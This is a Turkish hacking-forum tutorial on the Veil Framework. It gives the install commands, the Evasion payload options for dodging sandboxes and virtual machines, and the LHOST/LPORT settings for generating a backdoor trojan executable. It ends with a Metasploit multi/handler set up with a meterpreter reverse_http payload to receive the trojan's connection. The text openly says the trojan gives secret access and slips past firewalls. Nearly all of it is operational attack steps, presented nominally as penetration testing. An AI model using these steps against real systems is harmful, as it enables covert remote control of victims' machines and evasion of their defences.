VEİL Nedir ?

'PİON

Ar-Ge Ekibi Asistanı
16 Ocak 2023
195
115
Londra
6352702



ro3fzuc.png


VEİL NEDİR ?
Veil Framework, sızma testlerinde kullanılan bir araçtır. Hedef sisteme sızma testleri için Truva Atı virüslerinden yararlanarak Trojanlar oluşturmayı sağlar. Oluşturulan Trojanlar, hedef sistemde bir Backdoor açarak, saldırganın hedef makineye gizlice erişim sağlamasına imkan tanır. Bu yöntem, güvenlik duvarları gibi dış saldırılara karşı koruma sağlayan sistemleri atlatır; çünkü güvenlik duvarları genellikle dışarıdan gelen tehditlere karşı önlem alır, bu Trojanlar hedef makineye içeriden eriştiği için bu korumaları aşabilir.


Uokixkp.png



1- git clone GitHub - Veil-Framework/Veil: Veil 3.1.X (Check version info in Veil at runtime) (inmesi 15-20 dakika arası sürebilir)
2- cd /kayitliolduguklasör/Veil
3- ./config/setup.sh --force –silent
4- Veil (Çalıştırma komutu)


93js8oc.png



Komut satırına “Veil” yazıp onayladığımızda bizi böyle bir arayüz karşılayacaktır




Available tools: Güncel olarak iki adet aracın veil içinde olduğunu bizlere belirtmektedir.
use: Bir işlem seçerken kullanılmaktadır.
update: Araçların güncellenmesi için kullanılır.
options: Ayarlar kısmını gösteren bölümdür.
list: Kullanılabilir araçları bizlere listeler.
info: Belirli bir araçla ilgili detaylı bilgi almaya olanak sağlar.
exit: Veil programın dan çıkmayı sağlar.


“use 1” komutunu kullanarak Available Tools kısmında Evasion seçeneğini seçiyoruz.



“list” komutunu kullanarak içerisinde bulunan Payload’ları listeliyoruz



“use (istediğiniz payload numarası)” diyip Payload seçiyoruz
BADMACSFALSEVM tabanlı MAC adreslerini kontrol et
CLICKTRACKXYürütmeden önce X sayıda tıklama gerektir
COMPILE TO EXEYBir çalıştırılabilir dosyaya derle
CURSORCHECKFALSEFare hareketlerini kontrol et
DISKSIZEXSabit disk için minimum gigabayt sayısını kontrol et
HOSTNAMEXİsteğe bağlı: Gerekli sistem ana bilgisayar adı
INJECT METHODVirtualSanal veya Yığın
LHOSTMetasploit işleyicisinin IP'si
LPORT80Metasploit işleyicisinin bağlantı noktası
MINPROCSXÇalışan en az işlemci sayısı
PROCCHECKFALSEAktif VM işlemlerini kontrol et
PROCESSORSXİsteğe bağlı: Minimum işlemci sayısı
RAMCHECKFALSEEn az 3 gigabayt RAM kontrol et
SLEEPXİsteğe bağlı: "Y" saniye uyu, hızlandırılmış olup olmadığını kontrol et
USERNAMEXİsteğe bağlı: Gerekli kullanıcı hesabı
USERPROMPTFALSEEnjeksiyondan önce kullanıcıya sor
UTCCHECKFALSESistem UTC saatini kullanıp kullanmadığını kontrol et



back: Veil-Evasion kısmına geri dönecektir.
exit: Veil’den tamamen çıkmaya yarayan komuttur. Bu komutu yazdığınızda Veil kapanacaktır.
generate: Gerekli ayarlamaları yaptıktan sonra Trojan’ı oluşturmak amacıyla kullanılan komuttur.
options: Ayarlar kısmını bizlere açar.
set: Bir fonksiyon ayarlanırken kullanılır.


Trojan oluşturmak

Set LHOST (IP adresini yazmanız gerekmektedir bunun için ifconfig yazabilirsiniz.)

set LPORT 3659 (Biz 3659 portunu kullandık isterseniz siz başka bir port numarası da kullanabilirsiniz, önemli olan nokta kullanmak istediğiniz portun başka bir cihaz tarafından kullanılmaması gerekmektedir.)

set SLEEP (Oluşturduğumuz Trojan yolladığınız hedef makina da kaç saniye sonra aktif olsun bunu belirlediğimiz kısımdır biz 5 saniye sonra aktif olmasını istedik.)

set RAMCHECK true (En az 3GB ram olup olmadığını kontrol eden kısımdır.)

generate yazıp enter’a basarsanız artık Trojan oluşturulmaya başlanacaktır.





“generate” komutunu çalıştırdığımızda trojanımız oluşacaktır ve ardından bize Trojan ismini soracaktır





“bgs1” olarak tanımladık





Görüldüğü gibi trojanımız "Executable written to" kısmında hangi dizinde olduğunu göstermekte





TROJANIMIZI DİNLEME


1- Terminali açıp “msfconsole” komutunu çalıştırıyoruz



2- “use exploit/multi/handler” komutunu çalıştırıyoruz



3- Set PAYLOAD windows/meterpreter/reverse_http

Daha sonra "set KHOST" ve "set LPORT" diyip Trojan oluştururken kullandığımız ip adresi ve port numarasını giriyoruz

Ardından “exploit” veya “run” diyip dinlemeye alıyoruz…



rjkM2nt.png

 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.